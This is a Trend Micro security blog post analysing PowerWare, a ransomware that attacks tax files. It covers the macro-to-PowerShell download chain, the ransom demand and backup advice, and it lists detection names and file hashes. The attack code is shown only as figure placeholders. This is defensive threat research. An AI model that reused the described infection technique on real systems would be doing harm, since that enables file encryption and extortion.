• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Malware   »   Tax Day Extortion: PowerWare Crypto-ransomware Targets Tax Files

Tax Day Extortion: PowerWare Crypto-ransomware Targets Tax Files

  • Posted on:March 31, 2016 at 5:00 am
  • Posted in:Malware, Ransomware, Spam
  • Author:
    Trend Micro
0

by Anthony Melgarejo and Rhena Inocencio 

As we are certain about some aspects of life, the same can be said about cybercrime. Tax Day draws closer in the U.S., and as millions of Americans are in the process of filing their taxes, cybercriminals are also stepping in to make this task profitable for them and difficult for their victims. We have seen recent incidents of organizations falling for business email compromise (BEC) schemes related to tax filing; now, it looks like online extortionists have joined the fray as well.

PowerWare (detected by Trend Micro as RANSOM_POWERWARE.A) is a new crypto-ransomware that abuses Windows PowerShell for its infection routine. However, apart from encrypting files commonly targeted by ransomware, PowerWare also targets tax return files created by tax filing programs (for example, files with  .tax2013 and .tax2014 extensions). For users and organizations, losing current and previous years’ records can be a hassle, sometimes costly; in the U.S., for example, it is recommended that taxpayers keep the records of their tax returns for about of three (3) years after filing them because the statute of limitations for assessment of taxes and refunds runs for that same time period.

It is also worth noting that while ransomware that target specific tax-related files have been seen before, PowerWare’s technique using macro and PowerShell is quite uncommon.

Figure 1. Spam confuses users with “Invoice” as subject and “Financial Manager” as the sender

The infection starts when targets open a Microsoft Word document with an embedded malicious macro. This document is spread via emails, which is a common way to deliver crypto-ransomware.

The document instructs the victim to enable the macros. Once they are enabled, the malicious macro executes the following codes:

powerware_downloader-content

Figure 2. Word document instructing users to enabled macros

powerware_downloader-code

Figure 3. Snippet of the code that calls Powershell

As seen in the codes above, the macro uses cmd to execute an instance of Powershell.exe. This instance then connects to a website to download the PowerWare ransomware script (also written in Powershell) and save it as in the Windows Temporary folder as Y.ps1. The code then executes another Powershell instance to run PowerWare.

As mentioned earlier, PowerWare encrypts .tax2013 and .tax2014 extension files, among others, before self-destructing. It also drops an HTML file named “FILES_ENCRYPTED-READ_ME.HTML” in each folder with an encrypted file, detailing how an affected user can get their files back.

The attackers demand US$500 or 1.188 BTC and double that if the victim fails to pay before their deadline.

Figure 4. HTML page explaining the situation to the victim

Figure 5. Ransomware payment procedures

Figure 6. Ransom payment confirmation

Although PowerWare is a new family of crypto-ransomware, it mimics CryptoWall to a certain extent. It uses the same ransom note design as CryptoWall’s, and upon accessing the payment site, one can also observe the title bar bearing “CryptoWall Decript Service.” In a way, PowerWare wants the same impact as CryptoWall once had.

PowerWare also has the ability to enumerate all logical drives, including drives mapped to shared networks, making it a major threat to big companies with little or no experience in handling threats such as crypto-ransomware.

How to be ransomware-free this tax season

Knowledge of such threats serves as a user’s front line defense versus ransomware. Creating sufficient and regularly scheduled backups also help mitigate damage by ransomware. We also encourage users to implement the 3-2-1 rule for backing up their files:

  • At least three copies,
  • In two different formats,
  • with one of those copies off-site.

Trend Micro endpoint solutions such as Trend Microℱ Security,  Smart Protection Suites, and Worry-Freeℱ Business Security can protect users and businesses from this threat by detecting malicious files, and email messages before a user gets infected. They are also capable of blocking all related malicious URLs.

Products using the ATSE (Advanced Threats Scan Engine), such as Deep Discovery also detect this threat with the following detection names: PHP_POWERWARE.A, JS_CRYPWALL.IO, and W2KM_CRYPWALL.IO.

SHA1s for related files:

  • 9abeef3ed793f28a24562c3e5c3104eee99daa1c – downloader
  • 8a26892a7949c6a29d9d620c2ffd4c58921d6736 – PowerWare
  • ee2c9cf8cf6314c27e9724c529df8b3fb7c2e985 – PowerWare

Additional analysis by Ruby Santos

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: crypto-ransomwaremacro malwarespam mail

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, äž­ć›œ, æ—„æœŹ, ëŒ€í•œëŻŒê”­, 揰灣
  • Latin America Region (LAR): Brasil, MĂ©xico
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Đ ĐŸŃŃĐžŃ, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.